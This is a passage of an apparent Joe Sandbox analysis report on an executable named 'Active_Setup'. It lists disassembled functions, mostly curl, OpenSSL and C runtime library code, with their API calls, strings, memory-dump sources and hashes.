                                                                                                                                                  • Instruction ID: 1b98791baf073dd7d8dad76734f1646cd9ad357129f2848cb8792a24d8f8c1f0
                                                                                                                                                  • Opcode Fuzzy Hash: 5cc662320fb1889ba3c38ff6493382dd66995382d860dcf2b4ff6ea376d8f970
                                                                                                                                                  • Instruction Fuzzy Hash: 18D2E1B0A04706ABD724DF65DE83FABB3E4BF44714F04452DF89986242E735E904EB92
                                                                                                                                                  Function 01092233 Relevance: 66.4, APIs: 44, Instructions: 432COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___getlocaleinfo
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1937885557-0
                                                                                                                                                  • Opcode ID: 69786802775a037008fa8b90e051e8bf2173fbc0c81340c904b174da4d8c873d
                                                                                                                                                  • Instruction ID: f4f3b79262d6901740f0c34cbcf815bcb5f5a373fa8478cc4068dfe45d1e30c7
                                                                                                                                                  • Opcode Fuzzy Hash: 69786802775a037008fa8b90e051e8bf2173fbc0c81340c904b174da4d8c873d
                                                                                                                                                  • Instruction Fuzzy Hash: 10E1C3B290420EBEEF12DAE1CC44DFF7BBDFB18758F04052AF295D2050EA75AA159760
                                                                                                                                                  Function 00FC30D0 Relevance: 35.3, APIs: 12, Strings: 8, Instructions: 311networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • Name '%s' family %i resolved to '%s' family %i, xrefs: 00FC32ED
                                                                                                                                                  • Bind to local port %hu failed, trying next, xrefs: 00FC33B9
                                                                                                                                                  • Local Interface %s is ip %s using address family %i, xrefs: 00FC31F2
                                                                                                                                                  • Couldn't bind to '%s', xrefs: 00FC333B
                                                                                                                                                  • Local port: %hu, xrefs: 00FC345A
                                                                                                                                                  • getsockname() failed with errno %d: %s, xrefs: 00FC344D
                                                                                                                                                  • bind failed with errno %d: %s, xrefs: 00FC3495
                                                                                                                                                  • Couldn't bind to interface '%s', xrefs: 00FC324C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset_strncmp$bindhtons
                                                                                                                                                  • String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s
                                                                                                                                                  • API String ID: 599106724-2769131373
                                                                                                                                                  • Opcode ID: f42c08dad6c36dc9418afbd5a77ca68e2a4a74127053969715abef7fa549d611
                                                                                                                                                  • Instruction ID: 0bb0c17df72ca2042f154911e5df7bf2b20d9a0828675c0ff666ad6265cb06f7
                                                                                                                                                  • Opcode Fuzzy Hash: f42c08dad6c36dc9418afbd5a77ca68e2a4a74127053969715abef7fa549d611
                                                                                                                                                  • Instruction Fuzzy Hash: C5B1B471508342AFC720DB14DD96FAB7BE8EF99794F04851CF88987201EA35DA05DBA2
                                                                                                                                                  Function 01052940 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 154libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 0105297D
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 010529CB
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 010529D4
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 01052A17
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 01052A21
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 01052A35
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressLibraryProc$Free$Load
                                                                                                                                                  • String ID: .\crypto\dso\dso_win32.c$CreateToolhelp32Snapshot$KERNEL32.DLL$Module32First$Module32Next
                                                                                                                                                  • API String ID: 3262421712-1549069882
                                                                                                                                                  • Opcode ID: bfb494cb6b9f3c11c1686c112a451444fd0d297560746d037de7b379672a96e2
                                                                                                                                                  • Instruction ID: b576dee9f4b1550352b6ee810a1cbd8d57f761f7ab2fe749f3008295836eacf8
                                                                                                                                                  • Opcode Fuzzy Hash: bfb494cb6b9f3c11c1686c112a451444fd0d297560746d037de7b379672a96e2
                                                                                                                                                  • Instruction Fuzzy Hash: 4C412431604342ABD370AB69DC8AFAF77E9BF89750F040219F9C5D62C0EBB99104C796
                                                                                                                                                  Function 010745B0 Relevance: 19.9, APIs: 5, Strings: 6, Instructions: 603COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 010748BC
                                                                                                                                                    • Part of subcall function 00FE9B40: _raise.LIBCMT ref: 00FE9B5B
                                                                                                                                                    • Part of subcall function 00FE3D90: _memset.LIBCMT ref: 00FE3D9A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset$_raise
                                                                                                                                                  • String ID: .\ssl\s3_cbc.c$0$0$data_plus_mac_plus_padding_size < 1024 * 1024$j$mac_secret_length <= sizeof(hmac_pad)
                                                                                                                                                  • API String ID: 1505022616-3721666550
                                                                                                                                                  • Opcode ID: fef1ba0f98e3c570371ae65f80ad8fa8993e7187853e84467c9d5011919be5ed
                                                                                                                                                  • Instruction ID: c0bcf513c142f59d2ce65c5c9f6788d7d8e85e344863a416a4904dca2739c9bb
                                                                                                                                                  • Opcode Fuzzy Hash: fef1ba0f98e3c570371ae65f80ad8fa8993e7187853e84467c9d5011919be5ed
                                                                                                                                                  • Instruction Fuzzy Hash: AE32BF719083859BD325DF68C884BEFBBE9AFC5304F48491DE5C9C7202E675DA08CB96
                                                                                                                                                  Function 00FD4010 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 383COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _swscanf.LIBCMT ref: 00FD40D7
                                                                                                                                                    • Part of subcall function 0108174B: _vscan_fn.LIBCMT ref: 01081762
                                                                                                                                                  • _swscanf.LIBCMT ref: 00FD4178
                                                                                                                                                  • _swscanf.LIBCMT ref: 00FD41A3
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00FD41C2
                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00000000), ref: 00FD41C8
                                                                                                                                                  • __wcstoi64.LIBCMT ref: 00FD41D6
                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00FD41E0
                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,00000000), ref: 00FD41E9
                                                                                                                                                  Strings
                                                                                                                                                  • %31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz], xrefs: 00FD40A7
                                                                                                                                                  • %02d:%02d:%02d, xrefs: 00FD4172
                                                                                                                                                  • %02d:%02d, xrefs: 00FD419D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$_swscanf$__wcstoi64_vscan_fn
                                                                                                                                                  • String ID: %02d:%02d$%02d:%02d:%02d$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]
                                                                                                                                                  • API String ID: 1467486151-241090727
                                                                                                                                                  • Opcode ID: 9f1ac67f0f08d461d797b152342c00df848e9ae2b62492594e43b232e48e35da
                                                                                                                                                  • Instruction ID: b84b3c6be4deccd58c1b5db74b9047ffe8e0adb9616d47bf812036e4b7873e74
                                                                                                                                                  • Opcode Fuzzy Hash: 9f1ac67f0f08d461d797b152342c00df848e9ae2b62492594e43b232e48e35da
                                                                                                                                                  • Instruction Fuzzy Hash: 73D18FB1E083418FC714DF68D84062EBBE2AFD5720F584A2FF59587340E775E984AB92
                                                                                                                                                  Function 00FC64B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 80windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,00FC127B,?,00000000), ref: 00FC64B3
                                                                                                                                                  • _strerror.LIBCMT ref: 00FC64DF
                                                                                                                                                    • Part of subcall function 01083179: __getptd_noexit.LIBCMT ref: 01083180
                                                                                                                                                  • _strncpy.LIBCMT ref: 00FC64E9
                                                                                                                                                  • FormatMessageA.KERNEL32(00001000,00000000,?,00000000,?,000000FF,00000000), ref: 00FC6514
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,000000FF,Unknown error %d (%#x),?,?), ref: 00FC652B
                                                                                                                                                  • _strrchr.LIBCMT ref: 00FC653D
                                                                                                                                                  • _strrchr.LIBCMT ref: 00FC6558
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00FC6570
                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00FC657B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$_strrchr$FormatMessage__getptd_noexit_strerror_strncpycurl_msnprintf
                                                                                                                                                  • String ID: Unknown error %d (%#x)
                                                                                                                                                  • API String ID: 2726039267-2414550090
                                                                                                                                                  • Opcode ID: 33b03fc60e85397e4c8d898379fa147701caaaf31fd06ae3fa47eaa91554b0c5
                                                                                                                                                  • Instruction ID: dda67e26d2ab86e3e0cee60b762b3b0fd7ab3dfe359b4495a421a26b5d2faf9f
                                                                                                                                                  • Opcode Fuzzy Hash: 33b03fc60e85397e4c8d898379fa147701caaaf31fd06ae3fa47eaa91554b0c5
                                                                                                                                                  • Instruction Fuzzy Hash: DF1129B0B483432EEB213674AD46F7B36DC9F61795F180438F985D618AFA69CD0152B2
                                                                                                                                                  Function 00FD65C0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 381COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00FD6633
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,00000400,010A48F8,00000000,00000000,00000000,00000000,00000018,00000000,00000018,00000000,00000040,00000000,00000000,00000000,00000018), ref: 00FD691B
                                                                                                                                                    • Part of subcall function 00FC4DC0: curl_mvsnprintf.ACTIVE_SETUP(00000000,00000000,?,?,00FC108A,?,000000A0,[%s %s %s],Header,from,?,?,?,00000000,00000000), ref: 00FC4DD4
                                                                                                                                                  Strings
                                                                                                                                                  • gethostname() failed, continuing without!, xrefs: 00FD66BC
                                                                                                                                                  • NTLM, xrefs: 00FD65FE
                                                                                                                                                  • user + domain + host name too big, xrefs: 00FD69E0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memsetcurl_msnprintfcurl_mvsnprintf
                                                                                                                                                  • String ID: NTLM$gethostname() failed, continuing without!$user + domain + host name too big
                                                                                                                                                  • API String ID: 433933079-4124566065
                                                                                                                                                  • Opcode ID: b79f3c27c29a67c6d83bbba59c3f88dd4a101a38bd1e7abff3a24babff4727b6
                                                                                                                                                  • Instruction ID: 500652bd839326b6961e7c586fd0589913c6b7d21989d88bda19c5f02ef08e4a
                                                                                                                                                  • Opcode Fuzzy Hash: b79f3c27c29a67c6d83bbba59c3f88dd4a101a38bd1e7abff3a24babff4727b6
                                                                                                                                                  • Instruction Fuzzy Hash: CBE16DB15083419FD320DF54D881FABB7E9BBC8704F18892EF6C997381DA74A505DB52
                                                                                                                                                  Function 0107F1F2 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 01086202
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01086217
                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(010D8A88), ref: 01086222
                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0108623E
                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 01086245
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2579439406-0
                                                                                                                                                  • Opcode ID: 78357d5216619627359be72251cccd71c3ff59f7a3acfd6fe2fcaa2065fd0d40
                                                                                                                                                  • Instruction ID: e1ed0b832f0d00f48f824ec338e289a9e3909418d696ee5171ba1c1bc17aff51
                                                                                                                                                  • Opcode Fuzzy Hash: 78357d5216619627359be72251cccd71c3ff59f7a3acfd6fe2fcaa2065fd0d40
                                                                                                                                                  • Instruction Fuzzy Hash: 9221F3BC9052058FC7A0DF99F08668A3BF0BB08320F91012EEDC8C7B58E7BA55818F45
                                                                                                                                                  Function 01074908 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 296COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset
                                                                                                                                                  • String ID: 6
                                                                                                                                                  • API String ID: 2102423945-498629140
                                                                                                                                                  • Opcode ID: 142137b1f40abc06a3aa8b1660f041e04a16be247786f63137a9e5557f2fb12a
                                                                                                                                                  • Instruction ID: d34bfacf522541d53bc8054a5b141c6e09b05355b2124f8b111d989b3fffc839
                                                                                                                                                  • Opcode Fuzzy Hash: 142137b1f40abc06a3aa8b1660f041e04a16be247786f63137a9e5557f2fb12a
                                                                                                                                                  • Instruction Fuzzy Hash: 98A1C072A0C3859FD721DB78C880AEFBBE9AFC5200F444E5DF5D987201D6349A09CB96
                                                                                                                                                  Function 01074100 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 156COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 010741CA
                                                                                                                                                    • Part of subcall function 00FE9B40: _raise.LIBCMT ref: 00FE9B5B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset_raise
                                                                                                                                                  • String ID: .\ssl\s3_cbc.c$md_size <= EVP_MAX_MD_SIZE$orig_len >= md_size
                                                                                                                                                  • API String ID: 1484197835-1657088310
                                                                                                                                                  • Opcode ID: 6730895f8603f8ca26534dc6539f4d46e6c1aa300fbe8021b33dbde7eb58222c
                                                                                                                                                  • Instruction ID: 61500d39607ca17cae07011407eb99367811d547a0b0d075d0d2d15b7ac05a4c
                                                                                                                                                  • Opcode Fuzzy Hash: 6730895f8603f8ca26534dc6539f4d46e6c1aa300fbe8021b33dbde7eb58222c
                                                                                                                                                  • Instruction Fuzzy Hash: E151B175B083424FC714DE29D88169BFBE2BBD9200F544A2DE5C9CB342DA70D90ACB96
                                                                                                                                                  Function 00FB6130 Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 947libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,32C11320,-CEDBFD1E,?,00FB186C,?,?,?,?,?,?,?,?,?,00FB2322,?), ref: 00FB6407
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
